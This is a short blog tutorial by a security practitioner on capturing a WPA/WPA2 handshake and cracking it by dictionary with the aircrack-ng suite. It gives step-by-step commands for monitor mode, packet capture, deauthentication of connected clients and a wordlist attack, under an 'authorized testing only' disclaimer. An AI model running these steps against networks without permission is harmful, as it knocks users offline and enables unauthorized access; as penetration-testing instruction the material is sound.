WPA / WPA2 Handshake Cracking WITH Dictionary using Aircrack-ng | How To | Wireless Hacking

If you are planning to pentest a WPA/WPA2 network (with No WPS), I have two words for you: Good. Luck.

In all my experiments with penetration testing, I have found dictionary attacks on WPA/WPA2 handshakes to be the most annoying and futile exercises. This is because:

  • going through each word in a dictionary file containing millions of words is time-consuming.
  • success is not guaranteed (the passphrase may not be present in your dictionary).

During my experiments in India, the WiFi passphrases are usually a combination of Hindi and English words or a Hindu name which are, of course, not present in any dictionary that I download no matter how exhaustive it promises to be.

If you are still brave enough to try a dictionary attack on WPA handshake, here’s the procedure.

UPDATE: I have also posted a video on how capture and crack a WPA hanshake on my YouTube channel.

How to launch a Dictionary Attack on WPA Handshake

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface

airmon-ng start wlan0

This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.

airodump-ng mon0

Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.

airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for WPA handshake capture

At this point, you can use ‘aireplay-ng’ to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:

aireplay-ng --deauth 0 -a <AP\_MAC> -c <CLIENT\_MAC> mon0

If you don’t know the MAC of any associated client, simply ‘broadcast’ a ‘deauth’ to all clients:

aireplay-ng --deauth 0 -a <AP\_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use ‘aircrack-ng’ for this:

aircrack-ng capture\_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst

Now say your prayers and hope the passphrase is present in the dictionary you chose.

You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Pranshu Bajpai
Pranshu Bajpai
Principal Security Architect

Pranshu Bajpai, PhD, is a principle security architect..